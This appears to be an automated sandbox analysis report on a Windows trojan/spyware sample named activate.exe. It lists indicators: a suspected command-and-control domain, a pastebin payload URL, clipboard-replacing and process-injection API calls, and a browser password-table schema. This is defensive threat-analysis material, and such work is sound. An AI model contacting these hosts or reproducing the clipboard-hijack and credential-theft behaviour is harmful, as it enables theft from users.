HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Apr 2025 07:59:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=14400CF-Cache-Status: HITAge: 482Server: cloudflareCF-RAY: 92f96d4c1efadd21-ATL

Source: activate.exe	String found in binary or memory: http://Mozilla/5.0GET
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: activate.exe	String found in binary or memory: http://lame.sf.net
Source: activate.exe	String found in binary or memory: http://lame.sf.net32bits
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000002.00000002.1631547725.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: activate.exe	String found in binary or memory: http://www.brynosaurus.com/cachedir/
Source: activate.exe	String found in binary or memory: http://www.gnu.org/licenses/
Source: activate.exe	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: activate.exe	String found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
Source: activate.exe	String found in binary or memory: http://www.twolame.org
Source: activate.exe	String found in binary or memory: http://www.videolan.org/x264.html
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: activate.exe, 00000000.00000003.1532592754.000000000653D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: activate.exe	String found in binary or memory: http://xavs.sourceforge.net
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000002.00000002.1631547725.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: activate.exe, 00000000.00000003.2216013982.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215624710.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215907026.00000000029F8000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3178041253.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: activate.exe, 00000000.00000003.2216013982.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215624710.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215907026.00000000029F8000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3178041253.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/;
Source: activate.exe, 00000000.00000003.2216013982.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215624710.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215907026.00000000029F8000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3178041253.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/ed
Source: activate.exe, 00000000.00000002.3178104437.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215965048.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/yKBa
Source: activate.exe, 00000000.00000002.3178104437.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/yKBaQkD9
Source: activate.exe, 00000000.00000002.3178104437.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215965048.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/yKBae
Source: activate.exe, 00000000.00000003.2215839964.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3177826665.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215752026.00000000029D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com:443/raw/yKBaQkD9osoft
Source: activate.exe, 00000000.00000003.2216013982.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1600844211.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215624710.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.2215907026.00000000029F8000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3178041253.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/
Source: activate.exe, 00000000.00000002.3177722701.00000000029BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/1
Source: activate.exe, 00000000.00000003.1576557882.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/G
Source: activate.exe, 00000000.00000003.1576557882.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/U
Source: activate.exe, 00000000.00000002.3178104437.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1532493381.0000000006440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/pzaw
Source: activate.exe, 00000000.00000003.1532035112.000000000643C000.00000004.00000800.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1531844436.0000000006435000.00000004.00000800.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1532493381.0000000006440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/pzaw#
Source: activate.exe, 00000000.00000003.1576141574.0000000002A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run/pzawSta
Source: activate.exe, 00000000.00000003.1500619485.00000000029D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run:443/pzaw
Source: activate.exe, 00000000.00000003.1576398626.00000000029D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revitmodh.run:443/pzawal
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: activate.exe, 00000000.00000003.1549358462.0000000002A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: activate.exe, 00000000.00000003.1506328943.0000000006448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: activate.exe, 00000000.00000003.1537659355.0000000006750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.68.199:443 -> 192.168.2.5:49702 version: TLS 1.2

Source: C:\Users\user\Desktop\activate.exe

Code function: 0_2_06161000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GetClipboardSequenceNumber,GlobalAlloc,GlobalLock,GetClipboardSequenceNumber,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,GetClipboardSequenceNumber,Sleep,CloseClipboard,GetClipboardSequenceNumber,

0_2_06161000

Source: C:\Users\user\Desktop\activate.exe

0_2_06161000

Source: C:\Users\user\Desktop\activate.exe

0_2_06161000

Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE066E NtProtectVirtualMemory,	0_2_02EE066E
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE11E5 CreateThread,malloc,NtClose,free,	0_2_02EE11E5
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	0_2_02EE0B72
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE0CD8 NtAllocateVirtualMemory,	0_2_02EE0CD8
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE10E8 NtClose,	0_2_02EE10E8
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE114C NtClose,	0_2_02EE114C
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE19C5 free,NtClose,free,	0_2_02EE19C5
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02EE1084 NtClose,	0_2_02EE1084
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F12010 NtProtectVirtualMemory,	0_2_02F12010
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F11FD2 NtFreeVirtualMemory,	0_2_02F11FD2
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F11F7F NtAllocateVirtualMemory,	0_2_02F11F7F

Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_061611E0	0_2_061611E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F10575	0_2_02F10575
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F10000	0_2_02F10000
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDFDF0	0_2_04DDFDF0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E06640	0_2_04E06640
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD8FD0	0_2_04DD8FD0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC38C0	0_2_04DC38C0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCD8E0	0_2_04DCD8E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCF0AE	0_2_04DCF0AE
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0D820	0_2_04E0D820
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DEE2A0	0_2_04DEE2A0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE6AA0	0_2_04DE6AA0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E02A40	0_2_04E02A40
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DEA260	0_2_04DEA260
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCB3E0	0_2_04DCB3E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD4B59	0_2_04DD4B59
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF4B5B	0_2_04DF4B5B
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0E340	0_2_04E0E340
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD5B20	0_2_04DD5B20
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC9CE0	0_2_04DC9CE0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC8480	0_2_04DC8480
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD345D	0_2_04DD345D
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0DC70	0_2_04E0DC70
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF441F	0_2_04DF441F
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE5DC0	0_2_04DE5DC0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF45F0	0_2_04DF45F0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF4DEE	0_2_04DF4DEE
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDD553	0_2_04DDD553
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF557A	0_2_04DF557A
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDED7A	0_2_04DDED7A
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD3D1E	0_2_04DD3D1E
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0AD00	0_2_04E0AD00
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE4530	0_2_04DE4530
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE7520	0_2_04DE7520
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DFAED0	0_2_04DFAED0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF3ED0	0_2_04DF3ED0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCA6E0	0_2_04DCA6E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE96E0	0_2_04DE96E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0B670	0_2_04E0B670
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE1E4A	0_2_04DE1E4A
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E01E30	0_2_04E01E30
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCF600	0_2_04DCF600
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE3620	0_2_04DE3620
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC7790	0_2_04DC7790
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDCF8C	0_2_04DDCF8C
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0DF90	0_2_04E0DF90
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD07A0	0_2_04DD07A0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE174F	0_2_04DE174F
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC8F10	0_2_04DC8F10
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC2F20	0_2_04DC2F20
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCC0D0	0_2_04DCC0D0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E070F0	0_2_04E070F0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE4080	0_2_04DE4080
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DFD0B0	0_2_04DFD0B0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E02090	0_2_04E02090
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF7010	0_2_04DF7010
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCC830	0_2_04DCC830
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DEB9C0	0_2_04DEB9C0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE59FA	0_2_04DE59FA
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0D1D0	0_2_04E0D1D0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DC8990	0_2_04DC8990
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DCB990	0_2_04DCB990
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E0B120	0_2_04E0B120
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF5134	0_2_04DF5134
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DF5122	0_2_04DF5122
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD526B	0_2_04DD526B
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DD2A00	0_2_04DD2A00
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDAB94	0_2_04DDAB94
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DE7BB0	0_2_04DE7BB0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DFABB0	0_2_04DFABB0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DEBB6A	0_2_04DEBB6A
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04E03B10	0_2_04E03B10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00B00E70	2_2_00B00E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00B01338	2_2_00B01338
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00B0170D	2_2_00B0170D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00B0136A	2_2_00B0136A

Source: C:\Users\user\Desktop\activate.exe	Code function: String function: 04DD8FC0 appears 41 times
Source: C:\Users\user\Desktop\activate.exe	Code function: String function: 04DCAE40 appears 72 times

Source: activate.exe, 00000000.00000000.1318657595.000000000180C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: WM/OriginalFilename vs activate.exe
Source: activate.exe, 00000000.00000000.1318657595.000000000180C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %sWM/AlbumArtistalbum_artistWM/AlbumTitlealbumAuthorartistDescriptioncommentWM/ComposercomposerWM/EncodedByencoded_byWM/EncodingSettingsencoderWM/GenregenreWM/LanguagelanguageWM/OriginalFilenamefilenameWM/PartOfSetdiscWM/PublisherpublisherWM/ToolWM/TrackNumbertrackWM/MediaStationCallSignservice_providerWM/MediaStationNameservice_name vs activate.exe
Source: activate.exe, 00000000.00000003.1484750668.0000000006485000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WM/OriginalFilename vs activate.exe
Source: activate.exe, 00000000.00000003.1484750668.0000000006485000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %sWM/AlbumArtistalbum_artistWM/AlbumTitlealbumAuthorartistDescriptioncommentWM/ComposercomposerWM/EncodedByencoded_byWM/EncodingSettingsencoderWM/GenregenreWM/LanguagelanguageWM/OriginalFilenamefilenameWM/PartOfSetdiscWM/PublisherpublisherWM/ToolWM/TrackNumbertrackWM/MediaStationCallSignservice_providerWM/MediaStationNameservice_name vs activate.exe
Source: activate.exe, 00000000.00000003.1484750668.0000000006A36000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename. vs activate.exe
Source: activate.exe	Binary or memory string: WM/OriginalFilename vs activate.exe
Source: activate.exe	Binary or memory string: %sWM/AlbumArtistalbum_artistWM/AlbumTitlealbumAuthorartistDescriptioncommentWM/ComposercomposerWM/EncodedByencoded_byWM/EncodingSettingsencoderWM/GenregenreWM/LanguagelanguageWM/OriginalFilenamefilenameWM/PartOfSetdiscWM/PublisherpublisherWM/ToolWM/TrackNumbertrackWM/MediaStationCallSignservice_providerWM/MediaStationNameservice_name vs activate.exe
Source: activate.exe	Binary or memory string: OriginalFilename. vs activate.exe

Source: activate.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@2/2

Source: C:\Users\user\Desktop\activate.exe

Code function: 0_2_02F10C85 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,

0_2_02F10C85

Source: C:\Users\user\Desktop\activate.exe

Code function: 0_2_04E02A40 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,

0_2_04E02A40

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3424:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoax4rix.moq.ps1

Jump to behavior

Source: activate.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\activate.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: activate.exe, 00000000.00000003.1505533159.0000000006535000.00000004.00000800.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1519714201.000000000644D000.00000004.00000800.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1519454551.0000000006464000.00000004.00000800.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1506171913.0000000006459000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: activate.exe	String found in binary or memory: -help
Source: activate.exe	String found in binary or memory: speed presets are listed in x264 --help
Source: activate.exe	String found in binary or memory: speed presets are listed in x264 --help
Source: activate.exe	String found in binary or memory: id-cmc-addExtensions
Source: activate.exe	String found in binary or memory: set-addPolicy
Source: activate.exe	String found in binary or memory: src/add.c
